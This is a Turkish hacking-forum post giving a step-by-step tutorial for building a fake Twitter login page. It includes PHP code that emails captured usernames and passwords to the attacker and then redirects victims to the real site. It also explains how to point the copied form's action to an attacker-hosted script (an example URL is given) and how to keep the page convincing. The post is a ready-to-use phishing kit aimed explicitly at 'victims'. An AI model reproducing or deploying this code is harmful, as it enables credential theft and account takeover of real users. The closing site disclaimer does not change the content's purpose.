Post Adresi Olmadan Fake Yapımı

ERTYU

Üye
15 Eyl 2009
186
0
En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum

1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz

Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.

1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve
PHP- Kodu:
<?php
$kime="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[’User1’]."\\r\\n"."şifre : ".$_POST[’pass1’]."\\r\\n";
echo ’**********window.********.href = "’ . $yonlendir . ’";</script>’;
mail($kime, $baslik, $Crim)
?>


Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz

2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz

3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.

4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn=
PHP- Kodu:


<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post">


gibi

5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.

Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.